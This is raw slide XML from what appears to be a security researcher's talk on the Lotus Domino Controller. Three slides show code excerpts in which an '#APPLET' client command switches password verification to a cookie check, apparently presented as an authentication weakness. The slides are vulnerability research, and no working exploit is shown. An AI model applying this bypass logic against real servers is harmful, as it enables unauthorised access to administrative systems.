            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().trim();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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17</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323247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8864" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domino Controller</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-324544" y="1124744"/>
            <a:ext cx="9073008" cy="5472608"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>do           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//main loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ReadFromUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F4740A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//if #APPLET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>appletConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> = true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CUT - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in admindata.xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            . . . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>           if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>== null)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// If username  was not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WriteToUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("NOT_REG_ADMIN");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                 continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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18</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2926701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8864" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domino Controller</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234352" y="1124744"/>
            <a:ext cx="8730136" cy="5688632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>appletConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vrfyPwd.verifyUserPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userinfo.userPWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verifyAppletUserCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//If #APPLET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WriteToUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("VALID_USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                        else </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WriteToUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("WRONG_PASSWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>while(true); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Main loop end</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> done…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2628900" lvl="6" indent="0">
              <a:buNone/>
            </a:pP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19</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2690629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38944" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1268760"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>Pen-tester at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ERPscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>Digital Security Company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>Researcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>Writer at ][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>akep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t> magazine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>DCG#7812 POC</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2500" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2057" name="Picture 9" descr="C:\Users\Alexej\Downloads\tra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4458" y="4221088"/>
            <a:ext cx="1693888" cy="11954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Alexej\Downloads\logo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840" y="1467447"/>
            <a:ext cx="2640293" cy="792088"/>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Alexej\Downloads\log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3130" y="3212976"/>
            <a:ext cx="2513286" cy="682415"/>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Alexej\Downloads\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4586" y="2204864"/>
            <a:ext cx="2789862" cy="963315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Выноска 1 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3629958" y="2191259"/>
            <a:ext cx="1296144" cy="805693"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 4538"/>
              <a:gd name="adj4" fmla="val -104248"/>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Job , money and fun</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
